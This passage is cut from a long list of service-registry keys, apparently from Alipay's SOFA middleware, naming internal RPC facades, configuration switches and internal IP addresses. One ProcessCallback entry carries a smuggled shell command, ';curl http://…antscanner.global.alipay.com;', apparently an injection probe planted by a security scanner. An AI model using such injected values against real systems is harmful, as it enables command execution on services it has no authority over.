n.facade.service.ScriptEvalServiceFacade:1.0:publicDomain_finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.common.service.facade.api.FocusMapFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterPortalOrganFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.nfccdbsync.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.consumeprod.common.service.ebill.facade.EbillQuery4ElderRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.130.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inshealthprod.facade.InsureAppointmentOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.management.CampaignManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.184.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alideviceinfo.biz.rpc.facade.iothub.IotPayBizChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.midasCommonTair.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudinc:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppgw.facade.mng.CommunicationConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:openauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.securitycap.securityCapShardDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappconfig.common.service.facade.api.LocalDataManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.manual.SymbolSyncManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.biz.service.webspi.controller.KbSingleItemWrapperService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.MergeService:1.0:tiyubiz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.recon.IndustryDingTalkConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.62.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.necbill.common.service.repay.RepayNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:chairmosn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iexchangecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csinsight.common.service.facade.api.AssetsTagService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.masterdata.common.service.client.WorkDateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;curl http://33024869-uniqueId-104003023.antscanner.global.alipay.com;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.fortest.FininfluxEventHandlerTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mcardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServConfigPlatformService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_MSG_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.233.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:corgiunit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authprod.facade.oauth.OAuthClientQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.supergw.service.facade.transaction.MessageReceiveService:1.0:apintegrationprod_openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.whiteInstIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppgw.facade.mng.standard.api.IndustrygwStandardApiConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.asset.service.AssetDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.223.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciaasconnectorcore.biz.service.sofarest.ZoneSofaRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finsecurity.common.service.facade.ant120.DataDecisionEmergencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.zdatacontext.common.agent.drm.UniformAssertClientDRM.moneyThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dacuprod.service.facade.reportmanage.ReportSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.FreezeReceiptService:1.0:bizfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_PCCHK_DEDUCT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.recalNotifyUserSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iintegration.common.service.facade.api.AcceptanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.241.247#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.taskDriverToD2Api,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.itemcore.common.service.facade.v2.InventoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:finnanceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.242.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_MESHYOPT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromobus.common.service.facade.mangrove.ScriptManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antrecluse.facade.service.md.MasterDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:finstore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.243.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:securityexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.ServiceProviderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.changerequirement.facade.spi.ChangeIterationCheckSpi:1.0:ichecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.nearby.MobilelbsNearByUserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finfundprod.common.service.facade.UserSubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acprovisioncore.common.facade.application.AppServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antchaos.facade.api.ChaosPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_WQ_SERVERLESS_TASK_STREAM_STAMP_ID_FUNC_TEST@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.staff.admin.StaffQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antemc.service.facade.EmcChangeOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mservicesinspect_antProcessFlowAppraiseCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.UnAttendedReleaseV2Facade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.omp.RankQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.244.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.accordercore.fundsche.api.PartnerPlanCheckConditionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmng.common.service.facade.api.RiskBizInfoServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fuelprod.facade.OilStationSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:openauth@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.234.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.1.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.106.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcbenefitcore.facade.api.discount.BFDiscountRefundTwoPhaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_IGDMC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.alcorporation.common.service.facade.api.AlCorpDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.AppBaselineHistoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stocktraderiskprod.facade.rpc.RpcRequestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextLoadTestTBaseCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservcore.common.service.client.spi.SPInterface:1.0:kbcraftsmanSPInterface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.transaction.BizProcessQueryFacade:1.0:bizProcessQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.172.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.221.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.wall.common.service.BklightOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcbenefitcore.facade.service.inspection.RzoneInspectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.accessmarket.AccessMarketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.ruleinference.OfflineRuleInferenceTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_MOBILE_SECURE_CASE_MESSAGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.unibase.spi.adapter.facade.UniProcessSpiFacade:1.0:unibase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpdcore:name=com.alipay.fin.pdcore.common.util.drm.DbDrmConfigure.mysqlTaskTableNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerv2.realHAValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.IndirectMerchantDRM.isServiceOff,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:config.test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accustomercore.common.service.facade.UCKernelMfaManagerFacade:1.0:antchain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.config.drm.DrmAccountCacheAutoConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcsmart.facade.RcSmartApprovalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.ShopAppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cloancore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:cifmngTagApproval@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.EntityRuleRelationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.DataProcessService:1.0:finvirtualta@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antlawCancleDynamicCollbackServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.FinoutfluxQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.app1.Interface1:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.b2b.service.FinsignB2BFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.209.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.abilitycore.common.service.facade.schema.SchemaDefConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.cluster.facade.ClusterProduceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.AlipayRelationManageRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.NearDataTairRouterSwitcher.shadowModelBlackConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.psbp.core.service.ins.repository.InsuranceInstitutionCityRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.25.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crmhome.common.service.integration.mobilelbs.ReverseGeoCodeServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.tax.TaxBillService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antscheduler.facade.IZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-koiyunxu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.spi.FinnetReceiveService:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.releaseSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csassistant.service.facade.api.robot.ModelExecuteProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.RankQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.levelzero.api.LztransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.context.ContextQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.AutoInsServiceOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.open.gw.community.api.admin.OpenAdminUserOperateGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.136.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:antsecurity_marscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.mng.MerchantTreeMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auth_center.common.service.facade.v2.service.AuthService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.feecharge.common.service.facade.FeeTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:appProcessTaskCallbackV2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.StarWishUnitedDrm.forbiddenStarConstellation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebillcenter.common.service.facade.EbillReverseIndexQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icardcenter.service.facade.api.query.CardCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.delivery.rpc.AdvDiscountRecommendListRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csconfig.service.mng.facade.api.TreeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.72.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.metadata.common.service.tr.meta.MetaPartitionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trafficcardsp.common.service.facade.TcspTripServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.SpaceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zcache.tbase.addpChargeTairRz.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.capacitystudio.common.service.facade.register.AppRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdCompMngService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.27.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cscheck.service.facade.api.QcTrainStrategyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.16.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zfundcheck.common.service.facade.TableInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_solutionService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:reservecenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlbs.facade.promo.PromoMatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.FraudBizTaskInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.mwalletmng_sharedataReadDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipaycore.common.service.facade.mng.api.DepositbackManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:autoinsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.discountCampMessageSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_GFCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insendorseprod.common.service.InsEndorsementEntranceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.WithdrawQueryProxyService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.ContractQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkwirelessdataportal.common.service.acf.ACFBankScriptServerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.alphad.common.service.facade.markresult.api.IMarkResultRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finannafccore.common.service.facade.financialfestival.api.UserUnFinishTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.socialopen.OpenInvoiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.merchant.facade.api.TemporaryStorageQueryService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fdp.facade.api.DataToastFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmSpuPriceLevelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.pucprod.EbppInputFieldServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ialicore:name=com.ipay.ialicore.common.drm.RegionStatusSwitch.regionSupportAppConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.193.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:RainyTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.ordercore.ConsumerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.starstage.facade.StarstageUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:chargebackWorkform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.service.facade.DoubleCallFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkebppcenter.common.service.mobile.api.SmsCmdQueryMobileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbhub.common.service.facade.api.message.MessageFeedBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.intellibroadcastrobot.BroadcastRobotManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.ds.common.service.facade.proxy.DataSetQueryServiceProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.risk.UserRiskTestQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditplan.common.prod.settlement.PcreditPlanSettlementBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:mbillexprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.decisionx.facade.DataService:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.236.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.75.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.anteduprod.common.service.facade.api.ControlProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.indirectRecoveryOutSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditprod.service.PcreditAuthQuitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.payDecisionSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.miniprod.common.service.facade.api.miniappkeep.MiniAppKeepFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.gffund.common.service.facade.api.gfpayment.PaymentRealTimeBlockFacade:1.0:ca8d1935_PaymentInquiry@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.nearproxy.SalesQueryClientServiceProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.OpenIdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.CommonTriggerDrm.sasAidLoadMaxNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alphaq.common.facade.label.api.AppendDataService:1.0@DEFAULT#@#D